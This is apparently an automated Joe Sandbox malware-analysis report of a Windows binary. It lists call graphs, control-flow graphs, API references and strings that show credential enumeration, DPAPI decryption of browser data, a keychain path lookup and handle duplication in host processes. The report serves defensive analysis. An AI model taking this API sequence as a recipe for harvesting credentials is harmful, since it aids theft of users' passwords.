40451->40387 40452->40397 40453->40394 40454->40387 40455->40387 40457 41bc3b 101 API calls 40456->40457 40458 41f1b4 40457->40458 40459 41edad 86 API calls 40458->40459 40466 41f282 40458->40466 40460 41f1cb 40459->40460 40461 41f1f5 memcmp 40460->40461 40462 41f20e 40460->40462 40460->40466 40461->40462 40463 41f21b memcmp 40462->40463 40462->40466 40464 41f326 40463->40464 40467 41f23d 40463->40467 40465 41ee6b 86 API calls 40464->40465 40464->40466 40465->40466 40466->40406 40467->40464 40468 41f28e memcmp 40467->40468 40470 41c8df 56 API calls 40467->40470 40468->40464 40469 41f2a9 40468->40469 40469->40464 40472 41f308 40469->40472 40473 41f2d8 40469->40473 40471 41f269 40470->40471 40471->40464 40474 41f287 40471->40474 40475 41f27a 40471->40475 40472->40464 40479 4446ce 11 API calls 40472->40479 40476 41ee6b 86 API calls 40473->40476 40474->40468 40477 41ee6b 86 API calls 40475->40477 40478 41f2e0 40476->40478 40477->40466 40480 41b1ca memset 40478->40480 40479->40464 40480->40466 40481->40406 40482->40406 40483->40406 40484->40400 40485->40401 40486->40415 40487->40418 40488->40418 40489->40418 40490->40418 40491->40418 40492->40436 40493->40419 40494->40432 40495->40444 40496 441819 40499 430737 40496->40499 40498 441825 40500 430756 40499->40500 40512 43076d 40499->40512 40501 430774 40500->40501 40502 43075f 40500->40502 40514 43034a memcpy 40501->40514 40513 4169a7 11 API calls 40502->40513 40505 4307ce 40507 430819 memset 40505->40507 40515 415b2c 11 API calls 40505->40515 40506 43077e 40506->40505 40510 4307fa 40506->40510 40506->40512 40507->40512 40509 4307e9 40509->40507 40509->40512 40516 4169a7 11 API calls 40510->40516 40512->40498 40513->40512 40514->40506 40515->40509 40516->40512 40517 41493c EnumResourceNamesW

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 283 40dd85-40ddeb memset call 409bca CreateFileW 286 40ddf1-40de09 call 40afcf call 41352f 283->286 291 40de0b-40de1a NtQuerySystemInformation 286->291 292 40de1c 286->292 293 40de20-40de27 291->293 292->293 294 40de29-40de39 293->294 295 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 293->295 294->286 294->295 296 40de54-40de58 295->296 297 40de7a-40de8e call 413cfa call 413d4c 295->297 296->297 298 40de5a 296->298 307 40de94-40debb call 40e6ad call 409c52 _wcsicmp 297->307 308 40e00c-40e01b call 413d29 297->308 300 40de5d-40de63 298->300 302 40de74-40de78 300->302 303 40de65-40de6c 300->303 302->297 302->300 303->302 305 40de6e-40de71 303->305 305->302 315 40dee7-40def7 OpenProcess 307->315 316 40debd-40dece _wcsicmp 307->316 318 40dff8-40dffb 315->318 319 40defd-40df02 315->319 316->315 317 40ded0-40dee1 _wcsicmp 316->317 317->315 320 40dffd-40e006 317->320 318->308 318->320 321 40df08 319->321 322 40dfef-40dff2 CloseHandle 319->322 320->307 320->308 323 40df0b-40df10 321->323 322->318 324 40df16-40df1d 323->324 325 40dfbd-40dfcb 323->325 324->325 327 40df23-40df4a GetCurrentProcess DuplicateHandle 324->327 325->323 326 40dfd1-40dfd3 325->326 326->322 327->325 328 40df4c-40df76 memset call 41352f 327->328 331 40df78-40df8a 328->331 332 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 328->332 331->332 332->325 337 40dfd5-40dfed 332->337 337->322
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                    • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                    • String ID: dllhost.exe$p+8w@F8w@B8w$taskhost.exe$taskhostex.exe
                                                                    • API String ID: 594330280-2348828428
                                                                    • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                    • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                    APIs
                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                      • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                    • String ID:
                                                                    • API String ID: 2947809556-0
                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 767404330-0
                                                                    • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                    • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1690352074-0
                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041898C
                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystemmemset
                                                                    • String ID:
                                                                    • API String ID: 3558857096-0
                                                                    • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                    • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004455C2
                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                    • memset.MSVCRT ref: 0044570D
                                                                    • memset.MSVCRT ref: 00445725
                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                      • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                    • memset.MSVCRT ref: 0044573D
                                                                    • memset.MSVCRT ref: 00445755
                                                                    • memset.MSVCRT ref: 004458CB
                                                                    • memset.MSVCRT ref: 004458E3
                                                                    • memset.MSVCRT ref: 0044596E
                                                                    • memset.MSVCRT ref: 00445A10
                                                                    • memset.MSVCRT ref: 00445A28
                                                                    • memset.MSVCRT ref: 00445AC6
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                    • memset.MSVCRT ref: 00445B52
                                                                    • memset.MSVCRT ref: 00445B6A
                                                                    • memset.MSVCRT ref: 00445C9B
                                                                    • memset.MSVCRT ref: 00445CB3
                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                    • memset.MSVCRT ref: 00445B82
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                    • memset.MSVCRT ref: 00445986
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                    • API String ID: 2151808875-3798722523
                                                                    • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                    • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                    • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                    • API String ID: 2744995895-28296030
                                                                    • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                    • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                    • memset.MSVCRT ref: 0040B756
                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                    • memset.MSVCRT ref: 0040B851
                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                    • memcmp.MSVCRT ref: 0040B9BF
                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                    • memset.MSVCRT ref: 0040BB53
                                                                    • memcpy.MSVCRT ref: 0040BB66
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                                                    • String ID: chp$v10
                                                                    • API String ID: 580435826-2783969131
                                                                    • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                    • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                    Control-flow Graph

